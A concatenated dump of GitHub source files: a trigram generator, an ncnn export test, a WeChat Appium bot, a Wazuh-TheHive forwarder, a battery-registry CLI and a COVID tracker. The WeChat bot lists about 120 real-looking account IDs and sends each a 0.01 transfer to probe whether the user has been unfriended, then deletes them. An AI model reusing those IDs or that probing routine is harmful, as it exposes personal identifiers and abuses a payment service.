build_text(trigrams, seed):\n \"\"\"build a random text list from the trigrams dictionary\"\"\"\n new_text = seed[:]\n counter = 0\n while counter < 500:\n key_pair = new_text[counter : counter + 2]\n key_pair_tup = tuple(key_pair)\n\n if key_pair_tup not in trigrams:\n next_word = random.choice(new_text)\n\n else:\n next_word = random.choice(trigrams[key_pair_tup])\n new_text.append(next_word)\n counter += 1\n return new_text\n\n\ndef write_text(new_text):\n \"\"\"join the text together in a string and return it to the main program\"\"\"\n text_string = ' '.join(new_text)\n return text_string\n\n\nif __name__ == \"__main__\":\n # Using the main program given in the example\n try:\n filename = sys.argv[1]\n except IndexError:\n print(\"You must pass in a filename\")\n sys.exit(1)\n\n in_data = read_in_data(filename)\n words = make_words(in_data)\n trigrams, seed = build_trigram(words)\n new_text = build_text(trigrams, seed)\n text_string = write_text(new_text)\n\n print(text_string)\n","repo_name":"UWPCE-PythonCert-ClassRepos/SP_Online_PY210","sub_path":"students/nskvarch/lesson4/trigrams.py","file_name":"trigrams.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"1003279312","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom packaging import version\n\nclass Model(nn.Module):\n def __init__(self):\n super(Model, self).__init__()\n\n self.attention_0_0 = nn.MultiheadAttention(embed_dim=64, num_heads=4)\n self.attention_0_1 = nn.MultiheadAttention(embed_dim=40, num_heads=4, kdim=30, vdim=20)\n\n if version.parse(torch.__version__) >= version.parse('1.9'):\n self.attention_1_0 = nn.MultiheadAttention(embed_dim=64, num_heads=4, batch_first=True)\n self.attention_1_1 = nn.MultiheadAttention(embed_dim=40, num_heads=4, kdim=30, vdim=20, batch_first=True)\n\n def forward(self, xq, xk, xv, yq, yk, yv, xmask, ymask):\n x0, _ = self.attention_0_0(xq, xq, xq)\n x1, _ = self.attention_0_0(xq, xk, xv)\n x2, _ = self.attention_0_0(xq, xk, xk, attn_mask=xmask)\n x3, _ = self.attention_0_1(yq, yk, yv, attn_mask=ymask)\n\n if version.parse(torch.__version__) < version.parse('1.9'):\n return x0, x1, x2, x3\n\n xq = xq.transpose(0, 1)\n xk = xk.transpose(0, 1)\n xv = xv.transpose(0, 1)\n yq = yq.transpose(0, 1)\n yk = yk.transpose(0, 1)\n yv = yv.transpose(0, 1)\n\n y0, _ = self.attention_1_0(xq, xq, xq)\n y1, _ = self.attention_1_0(xq, xk, xv)\n y2, _ = self.attention_1_0(xq, xk, xk, attn_mask=xmask)\n y3, _ = self.attention_1_1(yq, yk, yv, attn_mask=ymask)\n\n return x0, x1, x2, x3, y0, y1, y2, y3\n\ndef test():\n torch.set_grad_enabled(False)\n\n net = Model().half().float()\n net.eval()\n\n torch.manual_seed(0)\n xq = torch.rand(20, 1, 64)\n xk = torch.rand(20, 1, 64)\n xv = torch.rand(20, 1, 64)\n yq = torch.rand(15, 1, 40)\n yk = torch.rand(24, 1, 30)\n yv = torch.rand(24, 1, 20)\n xmask = torch.rand(20, 20)\n ymask = torch.rand(4, 15, 24)\n\n a = net(xq, xk, xv, yq, yk, yv, xmask, ymask)\n\n # export torchscript\n if version.parse(torch.__version__) >= version.parse('1.12.0'):\n mod = torch.jit.trace(net, (xq, xk, xv, yq, yk, yv, xmask, ymask), check_trace=False)\n else:\n mod = torch.jit.trace(net, (xq, xk, xv, yq, yk, yv, xmask, ymask))\n mod.save(\"test_nn_MultiheadAttention.pt\")\n\n # torchscript to pnnx\n import os\n os.system(\"../../src/pnnx test_nn_MultiheadAttention.pt 
inputshape=[20,1,64],[20,1,64],[20,1,64],[15,1,40],[24,1,30],[24,1,20],[20,20],[4,15,24]\")\n\n # ncnn inference\n import test_nn_MultiheadAttention_ncnn\n b = test_nn_MultiheadAttention_ncnn.test_inference()\n\n for a0, b0 in zip(a, b):\n if not torch.allclose(a0, b0, 1e-4, 1e-4):\n print(a0)\n print(b0)\n return False\n return True\n\nif __name__ == \"__main__\":\n if test():\n exit(0)\n else:\n exit(1)\n","repo_name":"Tencent/ncnn","sub_path":"tools/pnnx/tests/ncnn/test_nn_MultiheadAttention.py","file_name":"test_nn_MultiheadAttention.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":18296,"dataset":"github-code","pt":"35"} +{"seq_id":"11987006637","text":"# coding=utf-8\nfrom appium import webdriver\nimport re\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom appium.webdriver.common.touch_action import TouchAction\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\n\nnr = r'你不是收款方好友,对方添加你为好友后才能发起转账'\nnr2 = r'对方微信号已被限制登录,为保障你的资金安全,暂时无法完成交易。'\ndesired_caps = {\n \"platformName\": \"Android\", # 系统\n \"platformVersion\": \"6.0\", # 系统版本号\n \"deviceName\": \"3782a8457d94\", # 设备名\n \"appPackage\": \"com.tencent.mm\", # 包名\n \"appActivity\": \"com.tencent.mm.ui.LauncherUI\", # app 启动时主 Activity\n \"unicodeKeyboard\": True, # 使用自带输入法\n \"noReset\": True, # 保留 session 信息,可以避免重新登录\n \"fullReset\": False, # 重启appium不会清空登录数据\n # \"skipDeviceInitialization\" : True,\n \"automationName\": \"UiAutomator1\" # 不会重复安装setting\n}\nll = ['微信号: a75559058', '微信号: chenyu349134578', '微信号: zhu1314277', '微信号: wxid_u14iculfxf6j22',\n '微信号: wxid_p3gnzuku06o722', '微信号: hao1981319', '微信号: lus1819', '微信号: lwh396925999',\n '微信号: wxid_7tc05e8obi0021', '微信号: wxid_vobbwehmbu9321', '微信号: xP_0128', '微信号: am879701633',\n '微信号: w594721591', '微信号: xlmlyc1027', '微信号: lms20141128', '微信号: CQY1002559385', '微信号: xinyi071030',\n '微信号: XIN5_1', '微信号: wiX_rgstnoih6axb21', '微信号: wjdxj843941744', '微信号: JungHuang1996', '微信号: baozhilin6789',\n '微信号: sp401957112', '微信号: HTH861', '微信号: w635333971', '微信号: huimouyixiao5520', '微信号: xiamiya-',\n '微信号: zh1634865852', '微信号: wxid_0wdnyog2a52i22', '微信号: wxid_rrk8k3u51nkq22', '微信号: qhj17876656745',\n '微信号: chunyanz1127', '微信号: abc291887441', '微信号: wxid_8dyvg2szs4qj22', '微信号: YB50JY8', '微信号: hzy6-6',\n '微信号: wxid_ns9gyk1k2qyd22', '微信号: Nuo77c', '微信号: Caijianming201758', '微信号: ainiyisi_001',\n '微信号: wxid_vyu64ig05xxe21', '微信号: zs15224626211', '微信号: mjcy1314com', '微信号: hygfs12345678',\n '微信号: A15220332697', '微信号: wxid_4s8c25flcao422', '微信号: yesweitinglin', '微信号: wxid_om1k1yii3utn22',\n '微信号: W996442281', '微信号: DJ15766562755', '微信号: W134999999', '微信号: hyj2392651463', '微信号: A18377355183',\n '微信号: chun791777195', '微信号: AA1550940501', '微信号: wxid_tdyj2pr5rp3u22', '微信号: HMc13424228080',\n '微信号: zhj703007739', '微信号: wxid_y3htn44zery022', '微信号: a15676565238', '微信号: wxid_vbi0q8i1kgjk22',\n '微信号: HMD10085', '微信号: wxid_ceujtqqtfah222', '微信号: wxid_9bp5vlxp89j422', '微信号: lzhui52168', '微信号: rvc668',\n '微信号: yaocai12', '微信号: wxid_myc8s8zzfyq222', '微信号: wxg13420080209', '微信号: wxid_1egdr8snu0cz22',\n '微信号: q296496345', '微信号: qq18078276807', '微信号: luo1141404975', '微信号: T96866558', '微信号: xf19980507',\n '微信号: wei623757432', '微信号: wxid_kdrmn1fbqrxe22', '微信号: lxx19978313889', '微信号: wxid_8wrwfmwnya7z22',\n '微信号: a13480996516', '微信号: liminx93p11', '微信号: zhi168866', '微信号: qwe15878290791', '微信号: vs644311324',\n '微信号: zhuzhuxia20190717', '微信号: ly464031711', '微信号: wxid_5l4s3sksd4gt22', 
'微信号: wxid_3e4op8jmxivf22',\n '微信号: aa13667722906', '微信号: H15977250087', '微信号: jiaqi_00323', '微信号: wxid_at4kfrv5zz9022',\n '微信号: zhouyong_466350531', '微信号: Yul-789', '微信号: wxid_wh8te7g1s8ju22', '微信号: A9sv888',\n '微信号: wxid_ewkyrbo6xs4x22', '微信号: wxid_mwhlxp9sxuxr22', '微信号: wxid_yo66nnhzlm7s22', '微信号: fei18878297940',\n '微信号: mm18778204248', '微信号: tyhbjijiubnook', '微信号: w18378207968', '微信号: Syoo88168', '微信号: QF1273688177',\n '微信号: x131188900', '微信号: yjhd201117', '微信号: wxid_nbzyjnuttazg22', '微信号: BTC20200607', '微信号: ruii925017',\n '微信号: wxid_l6iuqa8i56a022', '微信号: lianying116688', '微信号: Tommy2016', '微信号: pan1102296432',\n '微信号: Oyj18278224101', '微信号: wangxiaoli911230', '微信号: Amn98oo', '微信号: wdj768', '微信号: aaa13667800788']\ndriver = webdriver.Remote(\"http://localhost:4723/wd/hub\", desired_caps)\nwait = WebDriverWait(driver, 3000)\nfor yy in range(len(ll)):\n ss = ll[yy]\n num = re.findall('[0-9a-zA-Z_]+', ss)\n print(num)\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/he6\"))).click()\n time.sleep(1.5)\n print('sendkeys')\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/bxz\"))).click()\n print('click')\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/bxz\"))).send_keys(num)\n print('sendover')\n # driver.find_element_by_id(\"com.tencent.mm:id/bxz\").send_keys(num)\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/bn6\"))).click()\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/au0\"))).click()\n time.sleep(1)\n driver.find_elements_by_id('com.tencent.mm:id/rs')[5].click()\n # hb=driver.find_element_by_id('com.tencent.mm:id/rs')[5].get_attribute('name')\n # print(hb)\n time.sleep(1.5)\n driver.find_element_by_id('com.tencent.mm:id/jf4').send_keys('0.01')\n time.sleep(0.5)\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/e6c\"))).click() # 点击转账\n name1 = wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/ffh\"))).get_attribute('name')\n time.sleep(0.5)\n if name1 == nr or name1 == nr2:\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/ffp\"))).click() # 点击知道了\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/ei\"))).click() # 点击返回按钮\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/d8\"))).click() # 点击右上角 ...\n time.sleep(0.5)\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/h8t\"))).click() # 点击头像\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/d8\"))).click() # 点击右上角 ...\n wait.until(EC.element_to_be_clickable((By.ID, \"com.tencent.mm:id/ijq\"))).click() # 点击删除\n time.sleep(1)\n driver.find_elements_by_id('com.tencent.mm:id/ffp')[1].click() # 点击确定删除\n time.sleep(1)\n elif name1 == nr:\n pass\n\nprint(len(ll))\n","repo_name":"weiyuanhui520/learning","sub_path":"delete_friend04.py","file_name":"delete_friend04.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3037497689","text":"#!/bin/python3\n\nimport os\nimport json\nimport sys\nimport logging\nimport requests\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n################################################## Global variables ##################################################\n\nalert_file = open(sys.argv[1])\napi_key = sys.argv[2]\nhook_url = sys.argv[3]\nalert_json = json.loads(alert_file.read())\nalert_file.close()\n\nlog_file = \"/var/ossec/logs/integrations.log\"\nDEBUG = 
False\n\n################################################## Common functions ##################################################\n\n# Enables logging and configure it\ndef set_logger(name, logfile=None):\n hostname = os.uname()[1]\n format = '%(asctime)s {0} {1}: [%(levelname)s] %(message)s'.format(hostname, name)\n formatter = logging.Formatter(format)\n if DEBUG:\n logging.getLogger('').setLevel(logging.DEBUG)\n else:\n logging.getLogger('').setLevel(logging.INFO)\n\n streamHandler = logging.StreamHandler(sys.stdout)\n streamHandler.setFormatter(formatter)\n logging.getLogger('').addHandler(streamHandler)\n \n if logfile:\n fileHandler = logging.FileHandler(logfile)\n fileHandler.setFormatter(formatter)\n logging.getLogger('').addHandler(fileHandler)\n\n# Write the body of the TheHive Alert\ndef build_alert(wazuh_alert):\n try:\n description = \"An alert with rule id \"+str(wazuh_alert['rule']['id'])+\" and level \"+str(wazuh_alert['rule']['level'])+\" has been triggered\"\n severity = wazuh_alert['rule']['level'] // 4\n if severity < 1:\n severity = 1\n alert = { \"title\": wazuh_alert['rule']['description'],\n \"description\": description,\n \"type\": \"external\",\n \"source\": wazuh_alert['manager']['name'],\n \"sourceRef\": \"id: {}\".format(wazuh_alert['id']),\n \"tags\": wazuh_alert['rule']['groups'],\n \"severity\": severity,\n \"tlp\": severity - 1}\n except Exception as e:\n exc = sys.exc_info()\n logging.error(\"Error while writing the alert: [{}] {}\".format(exc[2].tb_lineno, e))\n sys.exit(1)\n return alert\n\ndef send_thehive(url, api, msg):\n headers = { \"content-type\": \"application/json\", \n \"Authorization\": \"Bearer {}\".format(api) }\n data = json.dumps(msg)\n try:\n logging.debug(\"Sending alert {}.\".format(data))\n result = requests.post(url, data=data, headers=headers)\n if result.status_code != 201:\n raise Exception(\"Code {} - {}\".format(result.status_code, result.text))\n except Exception as e:\n exc = sys.exc_info()\n logging.error(\"Error while contacting TheHive: [{}] {}\".format(exc[2].tb_lineno, e))\n sys.exit(1)\n return result.text\n\n################################################## Main Workflow ##################################################\nif __name__ == \"__main__\":\n set_logger(\"thehive-integration\", log_file)\n \n logging.debug(\"Starting TheHive Integration\")\n body = build_alert(alert_json)\n logging.debug(\"Alert building process completed successfully: {}\".format(body))\n response = send_thehive(hook_url, api_key, body)\n resp_dict = json.loads(response)\n logging.info(\"Alert sent to TheHive server. 
Response ID: {}\".format(resp_dict[\"id\"]))","repo_name":"dariommr/scripts","sub_path":"wazuh-integrations/TheHive/custom-thehive-simple.py","file_name":"custom-thehive-simple.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"34761407450","text":"import sys, os\nimport argparse\nimport web3\nfrom web3 import Web3\nfrom web3.middleware import geth_poa_middleware\n\n# Project modules\nimport utils\nfrom TextColor.color import bcolors\n\n\nURL = \"http://127.0.0.1:8545\"\n\nMGMT_CONTRACT_DB_NAME = utils.MGMT_CONTRACT_DB_NAME\nMGMT_CONTRACT_SRC_PATH = utils.MGMT_CONTRACT_SRC_PATH\nMGMT_CONTRACT_NAME = utils.MGMT_CONTRACT_NAME\nREGISTRATION_REQUIRED_GAS = utils.REGISTRATION_REQUIRED_GAS\nACCOUNT_DB_NAME = 'scenter.json'\n\ndef create_parser() -> argparse.ArgumentParser:\n    \"\"\"\n    Create cli argument parser\n\n    :return: Parser\n    :rtype: argparse.ArgumentParser\n    \"\"\"\n\n    parser = argparse.ArgumentParser(\n        description='Service provider tool',\n        epilog=\"\"\"\n        It is expected that the Web3 provider is specified by the WEB3_PROVIDER_URI\n        environment variable. E.g.\n        WEB3_PROVIDER_URI=file:///path/to/node/rpc-json/file.ipc\n        WEB3_PROVIDER_URI=http://192.168.1.2:8545\n        \"\"\"\n    )\n\n    parser.add_argument(\n        '--new', type=str, required=False,\n        help='Add new service scenter account'\n    )\n\n    parser.add_argument(\n        '--reg', action='store_true', required=False,\n        help='Register service scenter in the chain'\n    )\n\n    parser.add_argument(\n        '--verify', type=str, required=False,\n        help='Verify battery'\n    )\n\n    parser.add_argument(\n        '--approve_replacement', nargs=3, required=False,\n        help=\"Battery replacement \"\n    )\n\n    parser.add_argument(\n        '--get_address', action='store_true', required=False,\n        help='Get address of service center'\n    )\n\n    parser.add_argument(\n        '--transfer_battery_to_car', nargs=3, required=False,\n        help='Transfer battery to the car '\n    )\n\n    return parser\n\n\ndef register_scenter(_w3: Web3):\n    \"\"\"\n    Register new service center\n\n    :param Web3 _w3: Web3 instance\n    :return: Registration status message\n    :rtype: str\n    \"\"\"\n\n    mgmt_contract = utils.init_management_contract(_w3)\n    data = utils.open_data_base(ACCOUNT_DB_NAME)\n\n    if data is None:\n        sys.exit(f\"{bcolors.FAIL}Cannot access account database{bcolors.ENDC}\")\n    \n    actor = data['account']\n\n    tx = {'from': actor, 'gasPrice': utils.get_actual_gas_price(_w3)}\n\n    if REGISTRATION_REQUIRED_GAS * tx['gasPrice'] > _w3.eth.getBalance(actor):\n        sys.exit(f\"{bcolors.FAIL}Not enough funds to send transaction{bcolors.ENDC}\")\n    \n    utils.unlock_account(_w3, actor, data['password'])\n\n    try:\n        tx_hash = mgmt_contract.functions.registerServiceCenter().transact(tx)\n    except ValueError:\n        sys.exit(f\"{bcolors.FAIL}Already registered{bcolors.ENDC}\")\n\n    receipt = _w3.eth.wait_for_transaction_receipt(tx_hash, 120, 0.1)\n\n    if receipt.status == 1:\n        return f\"{bcolors.OKGREEN}Registered successfully{bcolors.ENDC}\"\n    \n    else:\n        return f\"{bcolors.FAIL}Registration failed{bcolors.ENDC}\"\n\n\ndef approve_replacement(w3: Web3, car_battery_id: str, sc_battery_id: str, car_address: str) -> None:\n    \"\"\"\n    Approve battery replacement if the battery is successfully verified\n    Create a json file with the approval status and maybe an error\n\n    :param Web3 w3: Web3 instance\n    :param str car_battery_id: Car's battery id\n    :param str sc_battery_id: Service center's battery id\n    :param str car_address: Car's address\n\n    :return: Nothing\n    :rtype: None\n    
\"\"\"\n\n sc_battery_id_path = f\"firmware/{car_battery_id[:8]}.py\"\n car_battery_id_path = f\"firmware/{sc_battery_id[:8]}.py\"\n\n data = utils.verify_battery(w3, car_battery_id_path)\n message = {'approved': False}\n\n if data[0]:\n message['approved'] = True\n \n message['error'] = \"Car's battery probably is fake\"\n\n utils.write_data_base(message, 'replacement.json')\n \n\ndef get_addr() -> str:\n \"\"\"\n Get service center's address\n\n :return: Service center's address\n :rtype: str \n \"\"\"\n\n data = utils.open_data_base(ACCOUNT_DB_NAME)\n return data['account']\n\n\ndef get_work_cost(car_battery_id: str, sc_battery_id: str) -> float:\n \"\"\"\n Calculate the cost of battery replacement based on its characteristics\n\n :param str car_battery_id: Car's battery id\n :param str sc_battery_id: Service center's battery id\n\n return: Cost of replacement\n rtype: float\n \"\"\"\n\n return 0.005\n\n\ndef transfer_battery_to_car(w3: Web3, car_account: str, car_battery_id: str, sc_battery_id) -> float:\n \"\"\"\n Transfer battery to car\n\n :param Web3 w3: Web3 instance\n :param str car_account: Car's address\n :param str car_battery_id: Car's battery id\n :param str sc_battery_id: Service centers's battery id\n\n return: Cost of battery replacement\n rtype: float\n \"\"\"\n\n result = utils.change_owner(w3, sc_battery_id, car_account, ACCOUNT_DB_NAME)\n\n if 'failed' in result:\n sys.exit(f\"{bcolors.FAIL}Service center does not own this battery!{bcolors.ENDC}\")\n\n return get_work_cost(car_battery_id, sc_battery_id)\n\n\ndef main() -> None:\n w3 = Web3(Web3.HTTPProvider(URL))\n\n # configure provider to work with PoA chains\n w3.middleware_onion.inject(geth_poa_middleware, layer=0)\n\n parser = create_parser()\n args = parser.parse_args()\n\n if args.new:\n print(utils.create_new_account(w3, args.new, ACCOUNT_DB_NAME))\n \n elif args.reg:\n print(register_scenter(w3))\n \n elif args.verify:\n data = utils.verify_battery(w3, args.verify)\n print(f\"Verified: {data[0]}\")\n print(f\"Total charges: {data[1]}\")\n print(f\"Vendor id: {data[2]}\")\n print(f\"Vendor name: {data[3]}\")\n\n elif args.approve_replacement:\n approve_replacement(w3, args.approve_replacement[0], args.approve_replacement[1], args.approve_replacement[2])\n \n elif args.get_address:\n print(get_addr())\n\n elif args.transfer_battery_to_car:\n print(transfer_battery_to_car(w3, args.transfer_battery_to_car[0], args.transfer_battery_to_car[1], args.transfer_battery_to_car[2]))\n\n else:\n sys.exit(f\"{bcolors.FAIL}No parameters provided{bcolors.ENDC}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"acid9reen/bas","sub_path":"scenter.py","file_name":"scenter.py","file_ext":"py","file_size_in_byte":6214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"38107221444","text":"import mysql.connector \r\nimport plotly.express as px\r\nimport datetime\r\nimport plotly\r\nimport pandas as pd\r\nimport requests \r\nfrom bs4 import BeautifulSoup\r\nimport plyer\r\nfrom tkinter import *\r\nfrom tkinter import messagebox,filedialog\r\ncon=mysql.connector.connect(host=\"localhost\",user=\"root\",password='root',database='surendran')\r\ncur=con.cursor()\r\nn=5\r\ndef Map():\r\n covids='https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv' \r\n covs='C:/Users/Admin/Documents/Documents/summarymohfw1updated.csv'\r\n print(\"###################\")\r\n print(\" 
COVID-19 MAPPING\")\r\n print(\"###################\")\r\n print(\"Which type of map would you like to view?\")\r\n print(\"1. Worldwide\")\r\n print(\"2. Statewise\")\r\n print(\"3. Both\")\r\n ch=int(input(\"Enter your choice:\"))\r\n df=pd.read_csv(covids)\r\n db=pd.read_csv(covs)\r\n da=datetime.datetime.now()\r\n def WorWid():\r\n fig=px.density_mapbox(df,lat='Lat',lon='Long',z=h,radius=30,center=dict(lat=9,lon=9),\r\n zoom=3,opacity=0.8,hover_name=h,\r\n color_continuous_scale=px.colors.diverging.BrBG,\r\n mapbox_style='stamen-terrain',\r\n title='Covid-19 Mapping(22/1/20-The Day Before Present)(Worldwide)')\r\n fig.show() \r\n plotly.offline.plot(fig,filename='E:\\map_exp.html',auto_open=True)\r\n def StatWid():\r\n fin=px.density_mapbox(db,lat='Lat',lon='Long',z=p,radius=30,center=dict(lat=9,lon=9),\r\n zoom=3,opacity=0.8,hover_name=p,hover_data=['States/Uts'],\r\n color_continuous_scale=px.colors.diverging.BrBG,\r\n mapbox_style='stamen-terrain',\r\n title='Covid-19 Mapping(Statewise)(New cases)')\r\n fin.show() \r\n plotly.offline.plot(fin,filename='E:\\map_exxp.html',auto_open=True)\r\n if ch==1:\r\n print(\"To display Covid-19 map(Worldwide):-\")\r\n print(\"Enter according to the range:22/1/20-the day before present(\",\r\n da.strftime(\"%d-%m-%y\"),\")\")\r\n print(\"Enter the day:\",end=\"\")\r\n d=int(input())\r\n print(\"Enter the month(1-12):\",end=\"\")\r\n m=int(input())\r\n print(\"Enter the year(20-\",da.strftime(\"%y\"),\"):\",end=\"\")\r\n y=int(input())\r\n h=str(m)+'/'+str(d)+'/'+str(y)\r\n WorWid()\r\n elif ch==2:\r\n print(\"To display Covid-19 map(Statewise):-\")\r\n print(\"Enter according to the range:03-01-22 - 16-01-22\")\r\n print(\"Enter the day:\",end=\"\")\r\n dd=int(input())\r\n p='1-'+str(dd)+'-22'\r\n StatWid()\r\n elif ch==3:\r\n print(\"To display Covid-19 map(Worldwide & Statewise):-\")\r\n print(\"Enter according to the range:03-01-22 - 16-01-22\")\r\n print(\"Enter the day:\",end=\"\")\r\n dd=int(input())\r\n h='1/'+str(dd)+'/22'\r\n p='1-'+str(dd)+'-22'\r\n WorWid()\r\n StatWid()\r\n else:\r\n print(\"Oops! 
This is an incompatible request\")\r\ndef Graph():\r\n    print(\"##############\")\r\n    print(\"COVID-19 GRAPH\")\r\n    print(\"##############\")\r\n    df = pd.read_excel('C:\protegograph\protegograph.xlsx')\r\n    Place = df['Place']\r\n    Cases = df['Cases']\r\n    Date = df['Date'].dt.strftime('%Y-%m-%d')\r\n    fig = px.bar(df,x=Place,y=Cases,color=Place,animation_frame=Date,animation_group=Place,range_y=[0,8000000])\r\n    plotly.offline.plot(fig,filename='protegograph.html')\r\ndef Track():\r\n    print(\"###############\")\r\n    print(\"COVID-19 TRACKER\")\r\n    print(\"###############\")\r\n    def datacollected():\r\n        def notification(title, message):\r\n            plyer.notification.notify(title= title,message= message,timeout = 15)\r\n        url = \"https://www.worldometers.info/coronavirus/\"\r\n        res = requests.get(url)\r\n        soup = BeautifulSoup(res.content,'html.parser') \r\n        tbody = soup.find('tbody')\r\n        abc = tbody.find_all('tr')\r\n        countrynotification = cntdata.get()\r\n        if(countrynotification == \"\"):\r\n            countrynotification = \"world\"\r\n        serial_number,countries , total_cases , new_cases , total_death , new_deaths, total_recovered,active_cases = [],[],[],[],[],[],[],[]\r\n        serious_critical , total_cases_permn, total_deaths_permn, total_tests, total_test_permillion, total_pop = [],[],[],[],[],[]\r\n        header = ['serial_number','countries' , 'total_cases' , 'new_cases' , 'total_death' , 'new_deaths', 'total_recovered','active_cases',\r\n        'serious_critical' , 'total_cases_permn', 'total_deaths_permn', 'total_tests', 'total_test_permillion', 'total_pop' ]\r\n        for i in abc:\r\n            id = i.find_all('td')\r\n            if(id[1].text.strip().lower() == countrynotification):\r\n                totalcases1 = int(id[2].text.strip().replace(',',\"\"))\r\n                totaldeath = id[4].text.strip()\r\n                newcases = id[3].text.strip()\r\n                newdeaths = id[5].text.strip()\r\n                notification(\"CORONA RECENT UPDATES OF {}\".format(countrynotification),\"Total Cases : {}\\nTotal Deaths : {}\\nNew Cases : {}\\nNew Deaths : {}\".format(totalcases1,totaldeath,newcases,newdeaths))\r\n            serial_number.append(id[0].text.strip())\r\n            countries.append(id[1].text.strip())\r\n            total_cases.append(id[2].text.strip().replace(',',\"\"))\r\n            new_cases.append(id[3].text.strip())\r\n            new_deaths.append(id[5].text.strip())\r\n            total_death.append(id[4].text.strip())\r\n            total_recovered.append(id[6].text.strip())\r\n            active_cases.append(id[7].text.strip())\r\n            serious_critical.append(id[8].text.strip())\r\n            total_cases_permn.append(id[9].text.strip())\r\n            total_deaths_permn.append(id[10].text.strip())\r\n            total_tests.append(id[11].text.strip())\r\n            total_test_permillion.append(id[12].text.strip())\r\n            total_pop.append(id[13].text.strip())\r\n        dataframe = pd.DataFrame(list(zip(serial_number,countries , total_cases , new_cases , total_death , \r\n        new_deaths, total_recovered,active_cases,\r\n        serious_critical , total_cases_permn, total_deaths_permn, total_tests, total_test_permillion, \r\n        total_pop)),columns=header)\r\n        sorts = dataframe.sort_values('total_cases',ascending = False)\r\n        for a in flist:\r\n            if (a == 'html'):\r\n                path2 = '{}/coronadata.html'.format(path)\r\n                sorts.to_html(r'{}'.format(path2))\r\n            if (a == 'json'):\r\n                path2 = '{}/coronadata.json'.format(path)\r\n                sorts.to_json(r'{}'.format(path2))\r\n            if (a == 'csv'):\r\n                path2 = '{}/coronadata.csv'.format(path)\r\n                sorts.to_csv(r'{}'.format(path2))\r\n        if(len(flist) != 0):\r\n            messagebox.showinfo(\"Notification\",\"Corona Record is saved {}\".format(path2),parent =coro)\r\n    def downloaddata():\r\n        global path\r\n        if(len(flist) != 
0):\r\n path = filedialog.askdirectory()\r\n else:\r\n pass\r\n datacollected()\r\n flist.clear()\r\n Inhtml.configure(state = 'normal')\r\n Injson.configure(state = 'normal')\r\n Inexcel.configure(state = 'normal')\r\n def inhtmldownload():\r\n flist.append('html')\r\n Inhtml.configure(state = 'disabled')\r\n def injsondownload():\r\n flist.append('json')\r\n Injson.configure(state = 'disabled')\r\n def inexceldownload():\r\n flist.append('csv')\r\n Inexcel.configure(state = 'disabled')\r\n coro = Tk()\r\n coro.title(\"Covid-19 Tracker and Notifications\")\r\n coro.geometry('800x500+200+80')\r\n coro.configure(bg='#556B2F')\r\n flist = []\r\n path = ''\r\n mainlabel = Label(coro,text=\"Corona Virus Live Tracker\",font=(\"new roman\",30,\"italic bold\"), bg = \"#FF8C00\",width=33\r\n ,fg = \"black\",bd=5)\r\n mainlabel.place(x=0,y=0)\r\n label2 = Label(coro,text=\"Download File in \",font=(\"arial\",20,\"italic bold\"), bg = \"#556B2F\")\r\n label2.place(x=15,y=200)\r\n cntdata = StringVar()\r\n entry1 = Entry(coro,textvariable = cntdata ,font = (\"arial\",20,\"italic bold\"), relief = RIDGE,bd = 2 , width = 32)\r\n entry1.place(x = 280, y = 100)\r\n Inhtml = Button(coro,text = \"Html\", bg = \"#2DAE9A\", font = (\"arial\",15,\"italic bold\"),relief = RIDGE,activebackground = \"#05945B\",\r\n activeforeground = \"white\",bd = 5,width = 5,command = inhtmldownload)\r\n Inhtml.place(x = 300, y = 200)\r\n Injson = Button(coro,text = \"json\", bg = \"#2DAE9A\", font = (\"arial\",15,\"italic bold\"),relief = RIDGE,activebackground = \"#05945B\",\r\n activeforeground = \"white\",bd = 5,width = 5,command = injsondownload)\r\n Injson.place(x = 300, y = 260)\r\n Inexcel = Button(coro,text = \"Excel\", bg = \"#2DAE9A\", font = (\"arial\",15,\"italic bold\"),relief = RIDGE,activebackground = \"#05945B\",\r\n activeforeground = \"white\",bd = 5,width = 5,command = inexceldownload )\r\n Inexcel.place(x = 300, y = 320)\r\n Submit = Button(coro,text = \"Submit\", bg = \"#CB054A\", font = (\"arial\",15,\"italic bold\"),relief = RIDGE,activebackground = \"#7B0519\",\r\n activeforeground = \"white\",bd = 5,width = 25,command = downloaddata)\r\n Submit.place(x = 450, y = 260)\r\n coro.mainloop()\r\ndef Quiz():\r\n print(\"################\")\r\n print(\"COVID-19 MCQ QUIZ\")\r\n print(\"################\")\r\n score = 0\r\n answer1 = input (\"Where was Covid-19 first detected? \\na. INDIA \\nb. CHINA \\nc.TURKEY \\nAnswer: \")\r\n if answer1== \"b\" or answer1 ==\"CHINA\":\r\n score += 1\r\n print (\"Correct!\")\r\n print (\"Score: \", score)\r\n print(\"\\n\")\r\n else:\r\n print (\"Incorrect! The answer is CHINA.\")\r\n print (\"Score: \", 